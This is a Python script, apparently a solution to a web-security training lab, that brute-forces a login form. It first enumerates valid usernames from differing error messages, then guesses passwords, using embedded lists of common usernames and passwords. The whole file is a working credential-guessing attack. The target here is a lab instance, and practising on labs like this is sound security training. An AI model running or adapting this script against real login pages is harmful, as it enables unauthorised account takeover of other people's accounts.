import requests

def brute_force_username(url, username_list, password="asd"):
    for username in username_list:
        print(f"Trying username: {username}")
        payload = {
            'username': username,
            'password': password
        }
        response = requests.post(url, data=payload)
        if ("Invalid username" not in response.text):
            print(f"Success! Username: {username}, Password: {password}")
            return username
    return None


def brute_force_password(url, username, password_list):
    for password in password_list:
        print(f"Trying password: {password}")
        payload = {
            'username': username,
            'password': password
        }
        response = requests.post(url, data=payload)
        if "Incorrect password" not in response.text:  # Replace with the actual failure message
            print(f"Success! Username: {username}, Password: {password}")
            return password
    return None


# Example usage
if __name__ == "__main__":
    target_url = "https://0a640077042994858326d73e00770044.web-security-academy.net/login"
    username_list = [
        "carlos",
        "root",
        "admin",
        "test",
        "guest",
        "info",
        "adm",
        "mysql",
        "user",
        "administrator",
        "oracle",
        "ftp",
        "pi",
        "puppet",
        "ansible",
        "ec2-user",
        "vagrant",
        "azureuser",
        "academico",
        "acceso",
        "access",
        "accounting",
        "accounts",
        "acid",
        "activestat",
        "ad",
        "adam",
        "adkit",
        "admin",
        "administracion",
        "administrador",
        "administrator",
        "administrators",
        "admins",
        "ads",
        "adserver",
        "adsl",
        "ae",
        "af",
        "affiliate",
        "affiliates",
        "afiliados",
        "ag",
        "agenda",
        "agent",
        "ai",
        "aix",
        "ajax",
        "ak",
        "akamai",
        "al",
        "alabama",
        "alaska",
        "albuquerque",
        "alerts",
        "alpha",
        "alterwind",
        "am",
        "amarillo",
        "americas",
        "an",
        "anaheim",
        "analyzer",
        "announce",
        "announcements",
        "antivirus",
        "ao",
        "ap",
        "apache",
        "apollo",
        "app",
        "app01",
        "app1",
        "apple",
        "application",
        "applications",
        "apps",
        "appserver",
        "aq",
        "ar",
        "archie",
        "arcsight",
        "argentina",
        "arizona",
        "arkansas",
        "arlington",
        "as",
        "as400",
        "asia",
        "asterix",
        "at",
        "athena",
        "atlanta",
        "atlas",
        "att",
        "au",
        "auction",
        "austin",
        "auth",
        "auto",
        "autodiscover",
    ]
    password_list = [
        "123456",
        "password",
        "12345678",
        "qwerty",
        "123456789",
        "12345",
        "1234",
        "111111",
        "1234567",
        "dragon",
        "123123",
        "baseball",
        "abc123",
        "football",
        "monkey",
        "letmein",
        "shadow",
        "master",
        "666666",
        "qwertyuiop",
        "123321",
        "mustang",
        "1234567890",
        "michael",
        "654321",
        "superman",
        "1qaz2wsx",
        "7777777",
        "121212",
        "000000",
        "qazwsx",
        "123qwe",
        "killer",
        "trustno1",
        "jordan",
        "jennifer",
        "zxcvbnm",
        "asdfgh",
        "hunter",
        "buster",
        "soccer",
        "harley",
        "batman",
        "andrew",
        "tigger",
        "sunshine",
        "iloveyou",
        "2000",
        "charlie",
        "robert",
        "thomas",
        "hockey",
        "ranger",
        "daniel",
        "starwars",
        "klaster",
        "112233",
        "george",
        "computer",
        "michelle",
        "jessica",
        "pepper",
        "1111",
        "zxcvbn",
        "555555",
        "11111111",
        "131313",
        "freedom",
        "777777",
        "pass",
        "maggie",
        "159753",
        "aaaaaa",
        "ginger",
        "princess",
        "joshua",
        "cheese",
        "amanda",
        "summer",
        "love",
        "ashley",
        "nicole",
        "chelsea",
        "biteme",
        "matthew",
        "access",
        "yankees",
        "987654321",
        "dallas",
        "austin",
        "thunder",
        "taylor",
        "matrix",
        "mobilemail",
        "mom",
        "monitor",
        "monitoring",
        "montana",
        "moon",
        "moscow",
    ]

    correct_username = brute_force_username(target_url, username_list)
    if correct_username:
        correct_password = brute_force_password(
        target_url, correct_username, password_list)
        if correct_password and correct_username:
            print(
                f"Login succeeded with username {correct_username} and password: {correct_password}")
        else:
            print("No valid password found.")
    else:
        print("No valid credentials.")
